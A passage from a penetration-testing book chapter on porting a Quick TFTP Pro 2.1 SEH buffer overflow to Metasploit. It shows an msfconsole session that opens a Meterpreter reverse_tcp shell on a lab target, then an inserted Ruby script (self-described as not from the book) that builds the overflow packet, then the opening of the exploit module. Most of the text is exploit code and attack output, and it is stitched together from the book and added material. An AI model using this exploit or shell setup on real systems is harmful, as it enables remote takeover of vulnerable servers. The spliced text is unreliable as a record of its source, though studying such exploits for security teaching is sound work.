
Porting Exploits to the Metasploit Framework   231

Figure 15-6: Quick TFTP fully controlled

Next, we remove the dummy shellcode from the module, let the Framework supply a real payload, and run it to get our shell, as shown here:

msf > use exploit/windows/tftp/quicktftp_book
msf exploit(quicktftp_book) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(quicktftp_book) > set LHOST 192.168.1.101
LHOST => 192.168.1.101
msf exploit(quicktftp_book) > set RHOST 192.168.1.155
RHOST => 192.168.1.155
msf exploit(quicktftp_book) > exploit

[*] Started reverse handler on 192.168.1.101:4444
[*] Trying target Windows XP SP2...
[*] Sending stage (747008 bytes)
[*] Meterpreter session 2 opened (192.168.1.101:4444 -> 192.168.1.155:1036)
meterpreter > getuid
Server username: V-XP-SP2-BARE\Administrator

With a Meterpreter shell open, we have successfully ported an SEH-based exploit to the Framework and let its mixins do the payload and SEH-record work for us.
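To make the wire format concrete, here is a stand-alone Ruby script, added as an example and not taken from the book or from the Metasploit module, that builds the same kind of TFTP read request the module sends: an overlong mode field laid out as filler, nSEH, SEH handler pointer, then shellcode. The offset to the SEH record (OFFSET_TO_SEH), the POP/POP/RET address (POP_POP_RET) and the INT3 dummy shellcode are assumed placeholder values for illustration, not the real numbers for Quick TFTP Pro 2.1; the script also enforces the one bad character that TFTP's NUL-terminated fields impose.

```ruby
require 'socket'

# The constants below are assumptions for illustration, not the real values for
# Quick TFTP Pro 2.1 (those come from the debugger work earlier in the chapter).
OFFSET_TO_SEH = 1000        # bytes of mode data before the nSEH pointer is overwritten
POP_POP_RET   = 0x41424344  # address of a POP/POP/RET gadget in a non-SafeSEH module
TFTP_RRQ      = 1           # TFTP opcode 1 = Read Request (RFC 1350)
TFTP_PORT     = 69

# nSEH: the handler's POP/POP/RET returns into this slot; JMP SHORT +6 (EB 06)
# hops over the two NOPs and the 4-byte handler pointer into the payload.
NSEH = "\xeb\x06\x90\x90".b

# Filename and mode are NUL-terminated on the wire, so 0x00 can never appear in
# anything placed in them.
BADCHARS = ["\x00".b].freeze

def check_badchars(data)
  BADCHARS.each do |bc|
    raise ArgumentError, "payload contains bad char 0x#{bc.unpack1('H*')}" if data.b.include?(bc)
  end
  data
end

# SEH record: [nSEH (4 bytes)][handler pointer, little-endian (4 bytes)]
def seh_record(handler_addr = POP_POP_RET)
  NSEH + [handler_addr].pack('V')
end

# Overlong mode string: [filler][nSEH][SEH][payload]
def build_mode_field(payload, offset: OFFSET_TO_SEH, handler: POP_POP_RET)
  check_badchars(payload)
  ('A'.b * offset) + seh_record(handler) + payload.b
end

# TFTP RRQ on the wire: | opcode (2) | filename | 0 | mode | 0 |
def build_tftp_rrq(filename, mode)
  [TFTP_RRQ].pack('n') + filename.b + "\x00".b + mode.b + "\x00".b
end

# Decode a request back into its fields, used here to check our own packet.
def parse_tftp_rrq(pkt)
  opcode = pkt[0, 2].unpack1('n')
  filename, mode = pkt[2..].split("\x00".b, 3)
  { opcode: opcode, filename: filename, mode: mode }
end

# TFTP has no handshake, so the single datagram is the whole attack.
def send_exploit(host, pkt, port: TFTP_PORT)
  sock = UDPSocket.new
  sock.send(pkt, 0, host, port)
  pkt.bytesize
ensure
  sock&.close
end

# Constructed dummy shellcode (INT3 breakpoints) of the kind used before a real
# payload is swapped in.
DUMMY_SHELLCODE = ("\xcc".b * 16).freeze

if __FILE__ == $PROGRAM_NAME
  pkt = build_tftp_rrq('test.txt', build_mode_field(DUMMY_SHELLCODE))
  puts "packet: #{pkt.bytesize} bytes, mode field #{parse_tftp_rrq(pkt)[:mode].bytesize} bytes"
  # send_exploit('192.168.1.155', pkt)   # lab target from the chapter; uncomment to send
end
```

Inside the Framework, generate_seh_record and generate_seh_payload from the Seh mixin produce the nSEH/SEH pair and the encoded payload for you; this script spells that layout out by hand so you can check with a parser that the handler pointer lands exactly at the assumed offset before pointing the real module at a target.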

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  include Msf::Exploit::Remote::Udp   # TFTP runs over UDP: gives us connect_udp/udp_sock
  include Msf::Exploit::Remote::Seh   # gives us generate_seh_record/generate_seh_payload

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Quick TFTP Pro 2.1 Long Mode Buffer Overflow',
      'Description'    => %q{
        This module exploits a stack overflow in Quick TFTP Pro 2.1.
      },